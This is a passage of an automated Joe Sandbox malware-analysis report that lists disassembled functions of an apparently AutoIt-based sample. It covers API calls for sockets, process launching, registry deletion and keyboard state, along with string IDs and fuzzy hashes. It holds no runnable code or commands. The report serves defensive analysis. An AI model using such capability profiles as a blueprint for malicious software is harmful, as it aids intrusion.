                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                            • _wcstok.LIBCMT ref: 0042EC94
                            • _wcscpy.LIBCMT ref: 0042ED23
                            • _memset.LIBCMT ref: 0042ED56
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                            • String ID: X
                            • API String ID: 774024439-3081909835
                            • Opcode ID: b7833cbe4afb2c33c07b995f144b48ea07171cc505d596b10b0d3f607d5a17b5
                            • Instruction ID: 1deaadeb87e9b67576eb74b6fcb59ed61ada6b76e57d2067d8c90a9b5255e7ad
                            • Opcode Fuzzy Hash: b7833cbe4afb2c33c07b995f144b48ea07171cc505d596b10b0d3f607d5a17b5
                            • Instruction Fuzzy Hash: EEC19A716083119FC715EF25D885F5AB7E0AF85310F41492EF899DB2A2DB70EC45CB86
                            Function 00436B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                            Download Yara Rule
                            APIs
                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00436C00
                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00436C21
                            • WSAGetLastError.WSOCK32(00000000), ref: 00436C34
                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00436CEA
                            • inet_ntoa.WSOCK32(?), ref: 00436CA7
                              • Part of subcall function 0041A7E9: _strlen.LIBCMT ref: 0041A7F3
                              • Part of subcall function 0041A7E9: _memmove.LIBCMT ref: 0041A815
                            • _strlen.LIBCMT ref: 00436D44
                            • _memmove.LIBCMT ref: 00436DAD
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                            • String ID:
                            • API String ID: 3619996494-0
                            • Opcode ID: 5fb84208df940f14f6aa2f08e72ff5b23941ceec70b18f7a507797537e297a81
                            • Instruction ID: ff011f3dbcce5fd33b26d8321b6d5526293cb24ef81303c4cc40260f48c944de
                            • Opcode Fuzzy Hash: 5fb84208df940f14f6aa2f08e72ff5b23941ceec70b18f7a507797537e297a81
                            • Instruction Fuzzy Hash: AE81EF71204201BBC711EB24CC86F6BB7A8AF88714F11892EF955DB2D2DB74ED05CB56
                            Function 003C1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42305d86b4bc71a75ffa1f90b1420ed3aa762c7f400caf1a5d825a7ebb50548a
                            • Instruction ID: a76a6fde5fa5d690af72cde340d6af2b3401bd9e082c413485616fafacfb2b83
                            • Opcode Fuzzy Hash: 42305d86b4bc71a75ffa1f90b1420ed3aa762c7f400caf1a5d825a7ebb50548a
                            • Instruction Fuzzy Hash: FE718974900109EFCB069F99CC49EBEBB78FF86314F208159F915EA252C734AE11DBA4
                            Function 0043F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 0043F448
                            • _memset.LIBCMT ref: 0043F511
                            • ShellExecuteExW.SHELL32(?), ref: 0043F556
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                              • Part of subcall function 003DFC86: _wcscpy.LIBCMT ref: 003DFCA9
                            • GetProcessId.KERNEL32(00000000), ref: 0043F5CD
                            • CloseHandle.KERNEL32(00000000), ref: 0043F5FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                            • String ID: @
                            • API String ID: 3522835683-2766056989
                            • Opcode ID: 9ec2929c5ba2d5204993bde70ed3862c6e04a521baa47ced5fcc99fc96267055
                            • Instruction ID: fb6b0d5c1adfaff008a0a0dfd849dc37cc069901e961cf48440e0f0a57b8652e
                            • Opcode Fuzzy Hash: 9ec2929c5ba2d5204993bde70ed3862c6e04a521baa47ced5fcc99fc96267055
                            • Instruction Fuzzy Hash: AB619A75E006199FCB05DFA4C885AAEBBF5FF4D310F15806AE81AAB351CB34AD45CB84
                            Function 00420F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: cd8337840daf33ca42c3b8f32427fbba988890bc26b9072a940de9abb2531fb6
                            • Instruction ID: 955f22244a1e9c16ccadee29ef00f9f96894341b9c42a9b8faf72b6dd4889dbf
                            • Opcode Fuzzy Hash: cd8337840daf33ca42c3b8f32427fbba988890bc26b9072a940de9abb2531fb6
                            • Instruction Fuzzy Hash: 515122607447E53DFB3642349C05BB7BEE95B06304F48858AE1C4869E3C2ECACD9D769
                            Function 00420D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$Parent
                            • String ID:
                            • API String ID: 87235514-0
                            • Opcode ID: 28ad8bb96e833879d218e1b7ce6f986f04e2ae5bb678641206322bca894fdc32
                            • Instruction ID: 91d8c636a202b5490407c466573d4d38e3f0451e76eb04f7afee544499d214b7
                            • Opcode Fuzzy Hash: 28ad8bb96e833879d218e1b7ce6f986f04e2ae5bb678641206322bca894fdc32
                            • Instruction Fuzzy Hash: C451F3A07546E57DFB3283249C45B7BBEE96F06300F48888AF1D4569C3C399ACC8D768
                            Function 004255FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _wcsncpy$LocalTime
                            • String ID:
                            • API String ID: 2945705084-0
                            • Opcode ID: df90c98866ed92fc670395fd28351bd5cb37a371afd5b243dbc1f4a85c506744
                            • Instruction ID: 795e222376d4e0592780ad7b80e992238429daa17fb24fcbdd3bd04119bf7a71
                            • Opcode Fuzzy Hash: df90c98866ed92fc670395fd28351bd5cb37a371afd5b243dbc1f4a85c506744
                            • Instruction Fuzzy Hash: B441F965C1026876CB12EBF58C4A9CFB3BC9F05300F404A66E508E7261FB34E745C7AA
                            Function 0044A056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$
                            • API String ID: 0-74666722
                            • Opcode ID: 95c3486cac56f8e17cc75c0721320fddfb343d7bfc67d3a9d2007d11d43ce83a
                            • Instruction ID: e7db96231999c65a7434480fc675631ae61c7772d41f33e9d5ed0f7ee55ea1af
                            • Opcode Fuzzy Hash: 95c3486cac56f8e17cc75c0721320fddfb343d7bfc67d3a9d2007d11d43ce83a
                            • Instruction Fuzzy Hash: 0441E639984114AFE720DF28CC48FAABBA8EB09310F154167F815A73E1C7389D65DB5A
                            Function 0041D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 0041D5D4
                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0041D60A
                            • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 0041D61B
                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0041D69D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorMode$AddressCreateInstanceProc
                            • String ID: ,,E$DllGetClassObject
                            • API String ID: 753597075-2224467221
                            • Opcode ID: 3ae6b55fe1f31eee9c756c92a85ab37eb35603826eff88bacfb251f8ae3e1180
                            • Instruction ID: 8b7b7f8114ca382eea97dcb08d38b22572a08b9fa216a8e3f4515232e3acfab6
                            • Opcode Fuzzy Hash: 3ae6b55fe1f31eee9c756c92a85ab37eb35603826eff88bacfb251f8ae3e1180
                            • Instruction Fuzzy Hash: 15417DF1A00204EFDB05DF54C884BDA7BA9EF44314B1581AAEC099F209D7B9DD84CBA8
                            Function 00423671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00423697,?), ref: 0042468B
                              • Part of subcall function 0042466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00423697,?), ref: 004246A4
                            • lstrcmpiW.KERNEL32(?,?), ref: 004236B7
                            • _wcscmp.LIBCMT ref: 004236D3
                            • MoveFileW.KERNEL32 ref: 004236EB
                            • _wcscat.LIBCMT ref: 00423733
                            • SHFileOperationW.SHELL32(?), ref: 0042379F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                            • String ID: \*.*
                            • API String ID: 1377345388-1173974218
                            • Opcode ID: 61458f4c924f1e37f2ed116ab06a25f077771f2f6f88454dba87480b2dbb5b35
                            • Instruction ID: b402e5c2405dff5503028aa5b030f109c2c75d44c0774de64f0bdbffcf176dce
                            • Opcode Fuzzy Hash: 61458f4c924f1e37f2ed116ab06a25f077771f2f6f88454dba87480b2dbb5b35
                            • Instruction Fuzzy Hash: 77419071208354AAC752EF60D441ADFB7ECEF89340F50092FB48AC7251EA38D689875A
                            Function 00440FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00440FD4
                            • RegOpenKeyExW.ADVAPI32 ref: 00440FFE
                            • FreeLibrary.KERNEL32(00000000), ref: 004410B5
                              • Part of subcall function 00440FA5: RegCloseKey.ADVAPI32(?), ref: 0044101B
                              • Part of subcall function 00440FA5: FreeLibrary.KERNEL32(?), ref: 0044106D
                              • Part of subcall function 00440FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441090
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441058
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                            • String ID:
                            • API String ID: 395352322-0
                            • Opcode ID: 2ac7a3a661a3af14880679db2f443f7147c6988275b238f35ced2b67262df8d0
                            • Instruction ID: 547f57948c4dc300fd6615d2b319e90501006a213603bcad2fd4ccfaadf75b82
                            • Opcode Fuzzy Hash: 2ac7a3a661a3af14880679db2f443f7147c6988275b238f35ced2b67262df8d0
                            • Instruction Fuzzy Hash: 09312D75901109BFEB15DF90DC89EFFB7BCEF09340F00017AE501A2651EB759E899AA8
                            Function 0041DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DB2E
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DB54
                            • SysAllocString.OLEAUT32(00000000), ref: 0041DB57
                            • SysAllocString.OLEAUT32(?), ref: 0041DB75
                            • SysFreeString.OLEAUT32(?), ref: 0041DB7E
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0041DBA3
                            • SysAllocString.OLEAUT32(?), ref: 0041DBB1
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: c18047b32fc8df47fac814441dde9f4f093076567df6498faa002eee4de62216
                            • Instruction ID: e9ec91a6541ae4638ee2802d500816861ddc53bd01d767a982662d4976ff13e3
                            • Opcode Fuzzy Hash: c18047b32fc8df47fac814441dde9f4f093076567df6498faa002eee4de62216
                            • Instruction Fuzzy Hash: A8218376A04219AF9F10DFA9DC88CFB73ACEF09360B018536F915DB250DA74AD858768
                            Function 00436173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00437D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00437DB6
                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004361C6
                            • WSAGetLastError.WSOCK32(00000000), ref: 004361D5
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0043620E
                            • connect.WSOCK32(00000000,?,00000010), ref: 00436217
                            • WSAGetLastError.WSOCK32 ref: 00436221
                            • closesocket.WSOCK32(00000000), ref: 0043624A
                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00436263
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                            • String ID:
                            • API String ID: 910771015-0
                            • Opcode ID: 04f60b4e24d025b233096dca3aa443d2a2c7d5fd28ea9e49a93184be22b99314
                            • Instruction ID: 636d31fa77eb0982b7cd35a9ae785afc42f34515d3ea3bcb98ba72a9f871296f
                            • Opcode Fuzzy Hash: 04f60b4e24d025b233096dca3aa443d2a2c7d5fd28ea9e49a93184be22b99314
                            • Instruction Fuzzy Hash: BD31C435600104AFDF10AF64CC85FBE7BA9EB49724F06806AFD05DB291CB78AC048B65
                            Function 0041F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                            • API String ID: 1038674560-2734436370
                            • Opcode ID: b1031fee15e11b2cdfa22993faa6fe9099f5097da2c6f0e9b03332ebd88c1c8d
                            • Instruction ID: 99c3c6b1d4aaac613b907e73994f3066bee8b3cc90c38a73ca7fb409bf756e06
                            • Opcode Fuzzy Hash: b1031fee15e11b2cdfa22993faa6fe9099f5097da2c6f0e9b03332ebd88c1c8d
                            • Instruction Fuzzy Hash: 3B213A7214466166D221A635AC03FE77398DF56340F60403BF8568B1D1EB985DCBC39D
                            Function 0041DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DC09
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041DC2F
                            • SysAllocString.OLEAUT32(00000000), ref: 0041DC32
                            • SysAllocString.OLEAUT32 ref: 0041DC53
                            • SysFreeString.OLEAUT32 ref: 0041DC5C
                            • StringFromGUID2.OLE32(?,?,00000028), ref: 0041DC76
                            • SysAllocString.OLEAUT32(?), ref: 0041DC84
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                            • String ID:
                            • API String ID: 3761583154-0
                            • Opcode ID: a934ed9ca811c20e405fc5b42c514a8fd4d2a333082774348d3a8b1b0ab5b45e
                            • Instruction ID: fdfba75f25f8ab8de9c515ed88f1eb87ffac7d0ef5dd572e02d3f18bd00233d7
                            • Opcode Fuzzy Hash: a934ed9ca811c20e405fc5b42c514a8fd4d2a333082774348d3a8b1b0ab5b45e
                            • Instruction Fuzzy Hash: 5C215875604114AF9B10DFA8DC89DEB77ECEB09360B108536F915CB261EAB4DC85C7A8
                            Function 004475CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                              • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                              • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00447632
                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0044763F
                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0044764A
                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00447659
                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00447665
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$CreateObjectStockWindow
                            • String ID: Msctls_Progress32
                            • API String ID: 1025951953-3636473452
                            • Opcode ID: b07711c52f47c4bbeab2aa6f29e364bd0e9fb9e306427b2c0eef216fe8146a33
                            • Instruction ID: b5b7fe7e8b4a72151193858c126e96c2665db231798b53609c65602813d75b94
                            • Opcode Fuzzy Hash: b07711c52f47c4bbeab2aa6f29e364bd0e9fb9e306427b2c0eef216fe8146a33
                            • Instruction Fuzzy Hash: FD11B6B1110119BFFF118F64CC85EE77F6DEF087A8F114115B604A6060CB769C22DBA4
                            Function 003E9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                            Download Yara Rule
                            APIs
                            • __init_pointers.LIBCMT ref: 003E9AE6
                              • Part of subcall function 003E3187: RtlEncodePointer.NTDLL(00000000), ref: 003E318A
                              • Part of subcall function 003E3187: __initp_misc_winsig.LIBCMT ref: 003E31A5
                              • Part of subcall function 003E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003E9EA0
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003E9EB4
                              • Part of subcall function 003E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003E9EC7
